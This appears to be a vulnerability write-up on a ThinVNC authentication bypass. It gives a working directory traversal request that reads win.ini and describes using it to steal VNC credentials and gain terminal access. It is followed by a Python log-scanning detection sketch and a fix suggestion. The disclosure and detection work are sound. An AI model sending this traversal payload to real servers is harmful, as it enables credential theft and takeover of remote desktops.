Thin-VNC Remote Authentication bypass


ThinVNC can be downloaded from SourceForge, and its source code is available on GitHub. According to its author, ThinVNC is a pure HTML5 & AJAX Remote Desktop implementation. ThinVNC works on any HTML5-compliant web browser. Users can access a remote PC from any computer or mobile OS; no additional plugin or installation is required on the client side.

ThinVNC uses Basic Authentication to authenticate users of the web VNC interface. The credentials are set on the server side when the VNC server is deployed. The VNC server has no fixed port; it runs on whatever port has been pre-configured.

A sample authentication screen looks like this:

When multiple attempts are made with wrong authentication credentials, the server returns an HTTP 401 error. This can be bypassed using the following vector:
Sample request:

GET /xyz/../../../../../../../../../../../../../../../../../../../../windows/win.ini HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

This directory traversal attack vector allows us to read any arbitrary file on the system. We can use the same vector to steal the credentials for the VNC client. Once we steal them, we can use the credentials to compromise the VNC server. Post compromise, we get terminal access to the VNC server.
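
Detection sketch for the request pattern above, added here as an example and not part of the original post or of ThinVNC's code. It assumes requests to the VNC port are logged in common log format (for instance by a reverse proxy in front of it); the function names and log lines are constructed for illustration. A hit with status 200 means a file outside the web root was served.

```python
import re
from urllib.parse import unquote, urlsplit

# Request line and status inside a common-log-format entry (assumed format).
REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def decode_fully(path, rounds=3):
    """Percent-decode repeatedly so %252e%252e is also seen as '..'."""
    for _ in range(rounds):
        path = unquote(path)
    return path

def escapes_root(target):
    """True if the request path climbs above the web root at any point."""
    # Windows servers accept '\' as a separator, so treat it like '/'.
    path = decode_fully(urlsplit(target).path).replace("\\", "/")
    depth = 0
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False

def scan(lines):
    """Return (status, target) for every logged request that escapes the root."""
    hits = []
    for line in lines:
        m = REQ.search(line)
        if m and escapes_root(m["target"]):
            hits.append((int(m["status"]), m["target"]))
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2020:10:00:00 +0000] "GET / HTTP/1.1" 401 0',
    '192.0.2.10 - - [01/Jan/2020:10:00:05 +0000] "GET /xyz/../../../../windows/win.ini HTTP/1.1" 200 92',
    '192.0.2.11 - - [01/Jan/2020:10:01:00 +0000] "GET /a/%2e%2e/%2e%2e/x HTTP/1.1" 404 0',
    '192.0.2.12 - - [01/Jan/2020:10:02:00 +0000] "GET /css/../index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for status, target in scan(SAMPLE):
        print(status, target)
```

The same depth check, applied by the server before any file is opened, rejects the request outright; `/css/../index.html` stays inside the root and is not flagged.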

